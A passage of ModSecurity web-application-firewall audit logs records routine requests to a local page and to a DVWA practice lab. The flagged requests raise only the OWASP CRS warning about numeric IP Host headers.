\"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc9RH8AAQEAABwOGoQAAAAB\"]"],"stopwatch":{"p1":526,"p2":919,"p3":58,"p4":139,"p5":83,"sr":21,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:17 --0400","transaction_id":"WRc9RX8AAQEAABwOGoUAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9RX8AAQEAABwOGoUAAAAB\"]"],"stopwatch":{"p1":526,"p2":1142,"p3":48,"p4":255,"p5":62,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:17 --0400","transaction_id":"WRc9RX8AAQEAABwOGoYAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9RX8AAQEAABwOGoYAAAAB\"]"],"stopwatch":{"p1":598,"p2":909,"p3":45,"p4":244,"p5":56,"sr":15,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:50 --0400","transaction_id":"WRc9Zn8AAQEAABwPUrUAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc9Zn8AAQEAABwPUrUAAAAC\"]"],"stopwatch":{"p1":645,"p2":902,"p3":62,"p4":323,"p5":55,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrYAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:07:47 GMT","ETag":"\"295-54f6adc7839e6\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc9Z38AAQEAABwPUrYAAAAC\"]"],"stopwatch":{"p1":615,"p2":1119,"p3":56,"p4":142,"p5":60,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrcAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9Z38AAQEAABwPUrcAAAAC\"]"],"stopwatch":{"p1":438,"p2":1248,"p3":69,"p4":373,"p5":65,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrgAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9Z38AAQEAABwPUrgAAAAC\"]"],"stopwatch":{"p1":442,"p2":830,"p3":44,"p4":237,"p5":46,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:01 --0400","transaction_id":"WRdBMX8AAQEAABwQSCYAAAAD","remote_address":"192.168.75.181","remote_port":47176,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBMX8AAQEAABwQSCYAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":1222,"p2":5483,"p3":101,"p4":158,"p5":89,"sr":43,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:01 --0400","transaction_id":"WRdBMX8AAQEAABwQSCcAAAAD","remote_address":"192.168.75.181","remote_port":47176,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"697","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdBMX8AAQEAABwQSCcAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":801,"p2":3361,"p3":101,"p4":399,"p5":65,"sr":42,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:07 --0400","transaction_id":"WRdBN38AAQEAABwRiH4AAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=0d1e1d2fde1d63d122a646a2193d0477"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdBN38AAQEAABwRiH4AAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":685,"p2":4475,"p3":180,"p4":505,"p5":207,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 